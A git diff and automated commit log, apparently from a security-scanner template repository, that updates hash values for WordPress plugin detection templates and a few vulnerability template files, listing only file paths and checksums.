-http/technologies/wordpress/plugins/ml-slider.yaml:df2b88b4cce0fda2f8ac8a40dc427b0ed0370a20 -http/technologies/wordpress/plugins/newsletter.yaml:b42409b87b0f8b61b44f122dd128ad0a52c75e03 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:8555c8dafd774bec574fd4922ef2e49c73466059 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:05f55322af406b99c9e83ccfdfa656a65d57db63 -http/technologies/wordpress/plugins/ninja-forms.yaml:1185e53f4b06dbe8dca5e98b81800527a3cd1b52 -http/technologies/wordpress/plugins/ocean-extra.yaml:0eebc60cb8b1355b0eaae837bdccb1de76e7a7c9 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:0c438358251f5b55150ac5fe5f5e167c0bdcaf09 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:bf9492a408f525ad24ddab1fde09d4328494e088 -http/technologies/wordpress/plugins/optinmonster.yaml:f8b24a0891df4f3ddc49df46c2e824dfe8e84ca1 -http/technologies/wordpress/plugins/otter-blocks.yaml:ea86159e7faeb8a724d0b8aae0094653d992d16e -http/technologies/wordpress/plugins/password-protected.yaml:a4bda5265a47ced3aa4c4b68ec9a2f67b1fda013 -http/technologies/wordpress/plugins/pdf-embedder.yaml:6e188c5522d4457154f5b7565c19c2ff68623fe5 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:cee6bb533fd1f9eb7760fb7d76b46eec7355c931 -http/technologies/wordpress/plugins/pixelyoursite.yaml:6729265e55d6cfa89312a2c867ace30d2cd9cd76 -http/technologies/wordpress/plugins/polylang.yaml:78ba80a50796ccd652a8b804652085a2b20eb22d +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:eeef7ae4d625e7f13a977e6eb715f549ac49f11e -http/technologies/wordpress/plugins/post-smtp.yaml:cc0da993982f386f4271197632b4f614caf8aea3 -http/technologies/wordpress/plugins/post-types-order.yaml:efa0acb7518f6347283a0ed9e57e197917e8ead0 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:fe8243a4b305ec161f55b9eefa83ade523c76cda -http/technologies/wordpress/plugins/pretty-link.yaml:e16cc129b0db82e5d8306a6ce3fe6293eb34736f -http/technologies/wordpress/plugins/really-simple-captcha.yaml:d916fcea3e003d5b77cf07930e24ee9e36d71a23 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:01c42daaad6393558bd172903bd485d32ec1e6e2 -http/technologies/wordpress/plugins/redirection.yaml:d01829d0b258d6f5018de634ade7f2f441a976a8 -http/technologies/wordpress/plugins/redux-framework.yaml:b6a80c6b9cdca8d8b938835a6fa3298c4affbfa9 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:7cdec797c405af6149308079759d9ac06abe7339 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:ec377a87c1a7164e7a424c0f11398a86668930d8 -http/technologies/wordpress/plugins/safe-svg.yaml:bcf3b0375a82a1b5fb15e4f0f679db9d6b2d8e71 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:5c4dbfde9e2d292d8220126806ed5b2069fcdb89 -http/technologies/wordpress/plugins/sg-cachepress.yaml:b76b803546da631ea63b38e32dbf17d6a27a93e7 -http/technologies/wordpress/plugins/sg-security.yaml:6b4f1a5f5fb8acea54288ca51a63dace27d53f02 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:eecb79e36dee2d9181da67b42e26f7ddabe9b39f -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:ea0a285b8095f1b4309c4d34efdf861bb6a69402 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:3df6314cd05cc3e373aa1378fa04b3332c64fe40 -http/technologies/wordpress/plugins/simple-history.yaml:ee1aeae68e69d816518eef2368428ecaeae6f934 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:d8b6a6698e5a58fd0fdb0881db5db46dddb28f9c -http/technologies/wordpress/plugins/siteorigin-panels.yaml:73c856f76715c9441d3cf23505f2d95adc0ca2f6 -http/technologies/wordpress/plugins/smart-slider-3.yaml:a852dce9948e9297eceec1813fec1668305c88cf -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:b40d732ab23a169aba58d36052d43e3d0f81c623 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:f64b6e59fdd0051fbb0b4a073964c48ccae70ac1 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d2f26681d00205b64731ea38e00265ee1535bad5 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:46cae10665e96d48d3e0a8398a11ce3b90bb6dd4 -http/technologies/wordpress/plugins/svg-support.yaml:292e386f505c7384f70a2d7c00dc019680cd55d4 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:8bc1eabfce84074c5e861011cf6f3b4b5ae95330 -http/technologies/wordpress/plugins/tablepress.yaml:6863dd81585960cf7d4372497bbc7c7cf6b6404d -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:fe585b10465f59b1df58dfb49b593167219d7e20 -http/technologies/wordpress/plugins/templately.yaml:01bffcda827741e0a5622bf35403aaba4208d837 -http/technologies/wordpress/plugins/the-events-calendar.yaml:ce8e43c352873f87ec01e21a4a26e1d4032a26bb +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9fa64b3d686e5194b4fa7bffe94921bd00bde4d5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:aebe923117e0a4121a19cbef255840f96d6406ce -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:767423495d3d5668aa913a1d9b679190fbab6072 -http/technologies/wordpress/plugins/under-construction-page.yaml:c636d9377705c06954c9bd23f251de6981e3f4db +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:12a5592e542f61353ab6f2bd5d9ee0f04df79f8e +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:61dbf84bcd91a948587d7efe4a6dfd4301a49a92 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:b791796a1d11fba132dc046ca84dd8a577d887ee -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:219e3e07aadbce9570fb93cc392c334a980dffbf -http/technologies/wordpress/plugins/webp-express.yaml:712bffa2d963270e67dcab80e391de3c7dd7a0c0 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:cb81e224f373a6da866b2f25b113118c3054f86c -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:ba35dea3ab83f3af39f3d61eac5d3766c3038455 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0f82d0b052cd2e63f4ac2d318ada09b7fe12a661 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:af1c26147cd46dd1e6ae89f71e120d2a53375f4c +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:50b8ad183a5f664420a100fe4f8ee1c431e09295 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e0fd40e11b4592297bf93556332b7c706790e653 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:7f46d76d9764d24d0fe49b0b162bbcc416f37046 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:180611225030671bedea29fd301ffc667711f8b3 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:de3b98dd0dad8fb337d7d87d4ca0cb1dd0c06217 -http/technologies/wordpress/plugins/woocommerce-services.yaml:8f036e28eb492737c2af79a29bc9edd7fc871c3e -http/technologies/wordpress/plugins/woocommerce.yaml:b14c4122222f9677de082a64952ee13e03cef5d8 -http/technologies/wordpress/plugins/wordfence.yaml:a3fc4bc2ca89def6428d441c0c87b03db61593ba -http/technologies/wordpress/plugins/wordpress-importer.yaml:f012e99684d68788f3e2c661be71d8fe5c12e6a2 -http/technologies/wordpress/plugins/wordpress-seo.yaml:eb780caf184258badd4aba2abe83eba587533b2e +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:606e6149586671be5b83ae94450fb79fce1f14c4 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:bb9112bd075d0257a88f98e99d0fa9a84ef78f62 -http/technologies/wordpress/plugins/wp-file-manager.yaml:034d843ba3aded901d3461479e521341e5baed4e -http/technologies/wordpress/plugins/wp-google-maps.yaml:379266a0012c1771a44ba97cab6484537b375a2f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:4d5fd18907042edb83549b964d841210bd5fd9a9 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:dcff13bdd9e85912f41d24a8b568baa18c39b176 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:9b2d5bec63a4cce32c65e10ad9236d5621c18d14 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:8aebd12bb29036b60e2ff4d3460f5b92fcd3bcfc -http/technologies/wordpress/plugins/wp-optimize.yaml:2b30e82e4a90b873cb94858ae519276ab01abcd7 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:93271793d503a755208424539759574bc62a0ce8 -http/technologies/wordpress/plugins/wp-reset.yaml:b128d381606a7efc2cb107e244ae41e5e05f1c10 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:0e6140e72b70222286bd62e267fb4ba1b52fc9a2 -http/technologies/wordpress/plugins/wp-rollback.yaml:c46758aecf6abaf1bc1d8cafdc58e245982c5c5d -http/technologies/wordpress/plugins/wp-seopress.yaml:4e2e3cfee843ed80e76828ab3b5679a06c96b61d -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:4df36e1e3f17499f0f1765d3a453c379500dac8e -http/technologies/wordpress/plugins/wp-smushit.yaml:2d1d4390069dfc6b5da70cd49c2b37d77a3863bb -http/technologies/wordpress/plugins/wp-statistics.yaml:23f3ee6b0e545d3a37ef5975ae8a2f8f24ddbd54 -http/technologies/wordpress/plugins/wp-super-cache.yaml:40e2abbd95f38f9e1622d0b80f935aadc88381ad +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:0b023d2de5767c73c590eb8505f54c789d3cb4b5 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:5958bfe42f37c632446be0f748e043117dce6360 -http/technologies/wordpress/plugins/wpforms-lite.yaml:aca4cf2be75e83728abc42f9d35a9eef67330af0 -http/technologies/wordpress/plugins/wps-hide-login.yaml:1590ed61432f9e1d296e6402a22d8b505eb070a3 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:ccbe1d0a5910d15fa52ec05aafc1cc6845a72d27 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:120382b84abe554580ac482834a67b0da3659abd +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -7843,7 +7843,7 @@ http/vulnerabilities/generic/generic-windows-lfi.yaml:ddcb321d2bb5e3e9bee57a6593 http/vulnerabilities/generic/host-header-injection.yaml:827f0694d3294d945da80d2dd7aa2ed3e820fc68 http/vulnerabilities/generic/oob-header-based-interaction.yaml:2cac39750dee5c610c6c1023a6fa0c73199e66ec http/vulnerabilities/generic/oob-param-based-interaction.yaml:635728a0bd7fbecc745a2be8d7a51b02ed0ee57b -http/vulnerabilities/generic/open-redirect-generic.yaml:d846ac7b28a783ecb5a42d54cf3e5c9c9112a15f +http/vulnerabilities/generic/open-redirect-generic.yaml:2e22c02de6e4dfb30dd01c6fd4f95f92cb55b9c3 http/vulnerabilities/generic/request-based-interaction.yaml:d3d7eaea6c38c5463861075a7542ed9c7e8f119e http/vulnerabilities/generic/top-xss-params.yaml:3e9a7e3fa96022f53af19ddd617225731c3bd9df http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:0a058b056b1584bc9de28df14baa9b57be220e88 @@ -8873,7 +8873,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5431ff537bff1b557b051e06024749caef57386f +templates-checksum.txt:e6d1bc6380df4f00e3f5119f0dbb97a128685d39 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 275a84b0fa218e2175a7efa659d53f3304c1b5e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 08:16:27 +0000 Subject: [PATCH 1204/1841] Auto Template Signing [Sun Jul 14 08:16:27 UTC 2024] :robot: --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + 